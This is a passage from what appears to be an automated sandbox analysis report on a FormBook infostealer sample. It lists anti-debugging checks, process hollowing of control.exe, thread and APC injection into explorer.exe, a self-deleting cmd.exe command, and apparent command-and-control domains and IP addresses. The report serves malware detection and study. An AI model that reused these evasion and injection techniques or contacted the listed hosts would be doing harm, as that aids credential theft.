Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04388E00 mov eax, dword ptr fs:[00000030h] 14_2_04388E00
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h] 14_2_0437AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h] 14_2_0437AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h] 14_2_0437AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h] 14_2_0437AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437AE73 mov eax, dword ptr fs:[00000030h] 14_2_0437AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411608 mov eax, dword ptr fs:[00000030h] 14_2_04411608
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436766D mov eax, dword ptr fs:[00000030h] 14_2_0436766D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04367E41 mov eax, dword ptr fs:[00000030h] 14_2_04367E41
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0440FE3F mov eax, dword ptr fs:[00000030h] 14_2_0440FE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0440FEC0 mov eax, dword ptr fs:[00000030h] 14_2_0440FEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428ED6 mov eax, dword ptr fs:[00000030h] 14_2_04428ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D46A7 mov eax, dword ptr fs:[00000030h] 14_2_043D46A7
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EFE87 mov eax, dword ptr fs:[00000030h] 14_2_043EFE87
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043676E2 mov eax, dword ptr fs:[00000030h] 14_2_043676E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043816E0 mov ecx, dword ptr fs:[00000030h] 14_2_043816E0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h] 14_2_04420EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h] 14_2_04420EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04420EA5 mov eax, dword ptr fs:[00000030h] 14_2_04420EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043836CC mov eax, dword ptr fs:[00000030h] 14_2_043836CC
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04398EC7 mov eax, dword ptr fs:[00000030h] 14_2_04398EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438E730 mov eax, dword ptr fs:[00000030h] 14_2_0438E730
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h] 14_2_04354F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04354F2E mov eax, dword ptr fs:[00000030h] 14_2_04354F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437F716 mov eax, dword ptr fs:[00000030h] 14_2_0437F716
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428F6A mov eax, dword ptr fs:[00000030h] 14_2_04428F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h] 14_2_043EFF10
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EFF10 mov eax, dword ptr fs:[00000030h] 14_2_043EFF10
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h] 14_2_0438A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A70E mov eax, dword ptr fs:[00000030h] 14_2_0438A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0442070D mov eax, dword ptr fs:[00000030h] 14_2_0442070D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0442070D mov eax, dword ptr fs:[00000030h] 14_2_0442070D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436FF60 mov eax, dword ptr fs:[00000030h] 14_2_0436FF60
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436EF40 mov eax, dword ptr fs:[00000030h] 14_2_0436EF40
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04368794 mov eax, dword ptr fs:[00000030h] 14_2_04368794
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h] 14_2_043D7794
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h] 14_2_043D7794
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7794 mov eax, dword ptr fs:[00000030h] 14_2_043D7794
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043937F5 mov eax, dword ptr fs:[00000030h] 14_2_043937F5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438002D mov eax, dword ptr fs:[00000030h] 14_2_0438002D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438002D mov eax, dword ptr fs:[00000030h] 14_2_0438002D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438002D mov eax, dword ptr fs:[00000030h] 14_2_0438002D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438002D mov eax, dword ptr fs:[00000030h] 14_2_0438002D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438002D mov eax, dword ptr fs:[00000030h] 14_2_0438002D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h] 14_2_0436B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h] 14_2_0436B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h] 14_2_0436B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436B02A mov eax, dword ptr fs:[00000030h] 14_2_0436B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h] 14_2_043D7016
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h] 14_2_043D7016
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D7016 mov eax, dword ptr fs:[00000030h] 14_2_043D7016
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04412073 mov eax, dword ptr fs:[00000030h] 14_2_04412073
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04421074 mov eax, dword ptr fs:[00000030h] 14_2_04421074
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04424015 mov eax, dword ptr fs:[00000030h] 14_2_04424015
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04424015 mov eax, dword ptr fs:[00000030h] 14_2_04424015
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04370050 mov eax, dword ptr fs:[00000030h] 14_2_04370050
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04370050 mov eax, dword ptr fs:[00000030h] 14_2_04370050
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438F0BF mov ecx, dword ptr fs:[00000030h] 14_2_0438F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h] 14_2_0438F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438F0BF mov eax, dword ptr fs:[00000030h] 14_2_0438F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043990AF mov eax, dword ptr fs:[00000030h] 14_2_043990AF
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043820A0 mov eax, dword ptr fs:[00000030h] 14_2_043820A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359080 mov eax, dword ptr fs:[00000030h] 14_2_04359080
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h] 14_2_043D3884
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D3884 mov eax, dword ptr fs:[00000030h] 14_2_043D3884
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043558EC mov eax, dword ptr fs:[00000030h] 14_2_043558EC
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov ecx, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 14_2_043EB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438513A mov eax, dword ptr fs:[00000030h] 14_2_0438513A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438513A mov eax, dword ptr fs:[00000030h] 14_2_0438513A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 mov eax, dword ptr fs:[00000030h] 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 mov eax, dword ptr fs:[00000030h] 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 mov eax, dword ptr fs:[00000030h] 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 mov eax, dword ptr fs:[00000030h] 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04374120 mov ecx, dword ptr fs:[00000030h] 14_2_04374120
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359100 mov eax, dword ptr fs:[00000030h] 14_2_04359100
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359100 mov eax, dword ptr fs:[00000030h] 14_2_04359100
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359100 mov eax, dword ptr fs:[00000030h] 14_2_04359100
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h] 14_2_0435B171
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435B171 mov eax, dword ptr fs:[00000030h] 14_2_0435B171
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435C962 mov eax, dword ptr fs:[00000030h] 14_2_0435C962
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h] 14_2_0437B944
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437B944 mov eax, dword ptr fs:[00000030h] 14_2_0437B944
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h] 14_2_043D51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h] 14_2_043D51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h] 14_2_043D51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D51BE mov eax, dword ptr fs:[00000030h] 14_2_043D51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h] 14_2_043861A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043861A0 mov eax, dword ptr fs:[00000030h] 14_2_043861A0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D69A6 mov eax, dword ptr fs:[00000030h] 14_2_043D69A6
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382990 mov eax, dword ptr fs:[00000030h] 14_2_04382990
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437C182 mov eax, dword ptr fs:[00000030h] 14_2_0437C182
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A185 mov eax, dword ptr fs:[00000030h] 14_2_0438A185
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0435B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0435B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0435B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043E41E8 mov eax, dword ptr fs:[00000030h] 14_2_043E41E8
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441EA55 mov eax, dword ptr fs:[00000030h] 14_2_0441EA55
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h] 14_2_04394A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04394A2C mov eax, dword ptr fs:[00000030h] 14_2_04394A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h] 14_2_0440B260
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0440B260 mov eax, dword ptr fs:[00000030h] 14_2_0440B260
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428A62 mov eax, dword ptr fs:[00000030h] 14_2_04428A62
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h] 14_2_0435AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435AA16 mov eax, dword ptr fs:[00000030h] 14_2_0435AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04355210 mov eax, dword ptr fs:[00000030h] 14_2_04355210
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04355210 mov ecx, dword ptr fs:[00000030h] 14_2_04355210
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04355210 mov eax, dword ptr fs:[00000030h] 14_2_04355210
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04355210 mov eax, dword ptr fs:[00000030h] 14_2_04355210
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04373A1C mov eax, dword ptr fs:[00000030h] 14_2_04373A1C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04368A0A mov eax, dword ptr fs:[00000030h] 14_2_04368A0A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0439927A mov eax, dword ptr fs:[00000030h] 14_2_0439927A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h] 14_2_0441AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441AA16 mov eax, dword ptr fs:[00000030h] 14_2_0441AA16
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043E4257 mov eax, dword ptr fs:[00000030h] 14_2_043E4257
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h] 14_2_04359240
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h] 14_2_04359240
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h] 14_2_04359240
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04359240 mov eax, dword ptr fs:[00000030h] 14_2_04359240
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0436AAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0436AAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438FAB0 mov eax, dword ptr fs:[00000030h] 14_2_0438FAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h] 14_2_043552A5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h] 14_2_043552A5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h] 14_2_043552A5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h] 14_2_043552A5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043552A5 mov eax, dword ptr fs:[00000030h] 14_2_043552A5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h] 14_2_0438D294
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438D294 mov eax, dword ptr fs:[00000030h] 14_2_0438D294
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382AE4 mov eax, dword ptr fs:[00000030h] 14_2_04382AE4
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382ACB mov eax, dword ptr fs:[00000030h] 14_2_04382ACB
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428B58 mov eax, dword ptr fs:[00000030h] 14_2_04428B58
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h] 14_2_04383B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04383B7A mov eax, dword ptr fs:[00000030h] 14_2_04383B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435DB60 mov ecx, dword ptr fs:[00000030h] 14_2_0435DB60
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441131B mov eax, dword ptr fs:[00000030h] 14_2_0441131B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435F358 mov eax, dword ptr fs:[00000030h] 14_2_0435F358
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435DB40 mov eax, dword ptr fs:[00000030h] 14_2_0435DB40
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h] 14_2_04384BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h] 14_2_04384BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384BAD mov eax, dword ptr fs:[00000030h] 14_2_04384BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438B390 mov eax, dword ptr fs:[00000030h] 14_2_0438B390
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382397 mov eax, dword ptr fs:[00000030h] 14_2_04382397
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h] 14_2_04361B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04361B8F mov eax, dword ptr fs:[00000030h] 14_2_04361B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0440D380 mov ecx, dword ptr fs:[00000030h] 14_2_0440D380
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441138A mov eax, dword ptr fs:[00000030h] 14_2_0441138A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043803E2 mov eax, dword ptr fs:[00000030h] 14_2_043803E2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437DBE9 mov eax, dword ptr fs:[00000030h] 14_2_0437DBE9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04425BA5 mov eax, dword ptr fs:[00000030h] 14_2_04425BA5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h] 14_2_043D53CA
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D53CA mov eax, dword ptr fs:[00000030h] 14_2_043D53CA
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00409B50 LdrLoadDll, 2_2_00409B50

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.gooooooo.xyz
Source: C:\Windows\explorer.exe Domain query: www.carriewilliamsinc.com
Source: C:\Windows\explorer.exe Network Connect: 148.72.244.75 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yixuan5.com
Source: C:\Windows\explorer.exe Domain query: www.inslidr.com
Source: C:\Windows\explorer.exe Domain query: www.farmacymerchants.com
Source: C:\Windows\explorer.exe Network Connect: 156.246.248.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 840000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Memory written: C:\Users\user\Desktop\5tCYPTkM6b.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3292 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Process created: C:\Users\user\Desktop\5tCYPTkM6b.exe "C:\Users\user\Desktop\5tCYPTkM6b.exe" Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe" Jump to behavior
Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.298778975.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.363976603.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.308798557.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.296008791.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.274396587.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.281179038.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.302392045.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,StrCmpNIW,lstrlenA, 0_2_00405AA7

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
